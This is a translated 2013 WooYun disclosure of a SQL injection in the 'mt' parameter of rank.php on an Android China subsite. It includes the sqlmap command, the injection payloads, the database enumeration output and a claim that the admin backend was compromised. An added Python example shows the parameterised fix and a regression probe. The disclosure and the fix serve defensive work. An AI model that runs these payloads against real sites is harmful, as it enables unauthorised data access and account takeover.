
Vulnerability summary

Defect ID: wooyun-2013-045088

Title: 安卓中国 (Android China) # SQL injection on a subsite leads to backend compromise

Vendor: 安卓中国 (Android China)

Author: Mr.leo

Submitted: 2013-12-06 11:39

Fix date: 2014-01-20 11:39

Published: 2014-01-20 11:39

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Vendor could not be reached, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2013-12-06: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2014-01-20: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

安卓中国 (Android China) # SQL injection on a subsite leads to backend compromise

Detailed description:

Site:
http://coolpad.anzhuo.cn
Injection point:
The mt parameter is not filtered, which leads to injection:
sqlmap.py -u "http://coolpad.anzhuo.cn/rank.php?keyword=&mt=1" -p "mt" --dbs --current-user --current-db
[root@Hacker~]# Sqlmap sqlmap.py -u "http://coolpad.anzhuo.cn/rank.php?keyword=&mt=1" -p "mt" --dbs --current-user --current-db
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:36:52
[09:36:53] [INFO] resuming back-end DBMS 'mysql'
[09:36:53] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: mt
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: keyword=&mt=1 AND 1460=1460
Type: UNION query
Title: MySQL UNION query (NULL) - 25 columns
Payload: keyword=&mt=1 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a776f633a,0x57474e574b79737a4668,0x3a646a673a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: keyword=&mt=1 AND SLEEP(5)
---
[09:36:53] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.9
back-end DBMS: MySQL 5.0.11
[09:36:53] [INFO] fetching current user
current user: 'anzhuovoteuser@localhost'
[09:36:53] [INFO] fetching current database
current database: 'anzhuovote'
[09:36:53] [INFO] fetching database names
available databases [56]:
[*] android_rom
[*] anzhuoblog
[*] anzhuouucenter
[*] anzhuovote
[*] gobbs
[*] information_schema
[*] mail_system
[*] mysql
[*] talkphone
[*] test
[*] testultrax
[*] ultrax
[*] ultrax20120725
[*] ultrax20130523
萝卜

1236.png


/etc/passwd:
The backend password for subsite 1 had already been changed by someone (the site admin or a white hat?). Luckily I had taken a screenshot....
A screenshot of the successful login and of the username and password; the md5 can be looked up

345.png


678.png


over

Proof of vulnerability:

available databases [56]:
[*] android_rom
[*] anzhuoblog
[*] anzhuouucenter
[*] anzhuovote
[*] gobbs
[*] information_schema
[*] mail_system
[*] mysql
[*] talkphone
[*] test
[*] testultrax
[*] ultrax
[*] ultrax20120725
[*] ultrax20130523

Remediation:

1# Fix the injection vulnerability
2# Block external access to the admin backend
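Remediation item 1 in working code, as an added example that is not from the report or the site: the unfiltered mt lookup the report describes, mirrored beside a hardened version that validates the parameter as an integer id and binds it, with a regression check built from the boolean-based probe pair in the sqlmap output above. An in-memory SQLite table stands in for the site's MySQL database; the table name and columns are assumed.

```python
import re
import sqlite3


def make_db():
    # Constructed stand-in for the rank.php backend: an in-memory SQLite
    # table instead of the site's MySQL database (schema is assumed).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE app_rank (id INTEGER, name TEXT, mt INTEGER)")
    db.executemany("INSERT INTO app_rank VALUES (?, ?, ?)",
                   [(1, "app-a", 1), (2, "app-b", 2), (3, "app-c", 2)])
    return db


def rank_vulnerable(db, mt):
    # The flaw in the report: the raw mt value is spliced into the SQL text,
    # so the caller controls the structure of the query, not just a value.
    sql = "SELECT id, name, mt FROM app_rank WHERE mt=" + mt
    return db.execute(sql).fetchall()


def rank_hardened(db, mt):
    # Fix: mt is a small integer id, so reject anything else up front, then
    # pass it as a bound parameter so it can only ever be treated as a value.
    if not re.fullmatch(r"[0-9]{1,9}", mt):
        raise ValueError("mt must be a non-negative integer")
    sql = "SELECT id, name, mt FROM app_rank WHERE mt=?"
    return db.execute(sql, (int(mt),)).fetchall()


def injectable(handler, db):
    """Regression check using the boolean-based pair from the sqlmap output:
    a handler is injectable if a true and a false tautology appended to the
    same id produce different results. A correct handler rejects both."""
    results = []
    for probe in ("1 AND 1460=1460", "1 AND 1460=1461"):
        try:
            results.append(handler(db, probe))
        except ValueError:
            results.append(None)
    return results[0] != results[1]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler injectable:", injectable(rank_vulnerable, db))  # True
    print("hardened handler injectable:  ", injectable(rank_hardened, db))    # False
    print("hardened lookup for mt=2:", rank_hardened(db, "2"))
```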

Copyright notice: please credit the source when reposting: Mr.leo@乌云


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively refused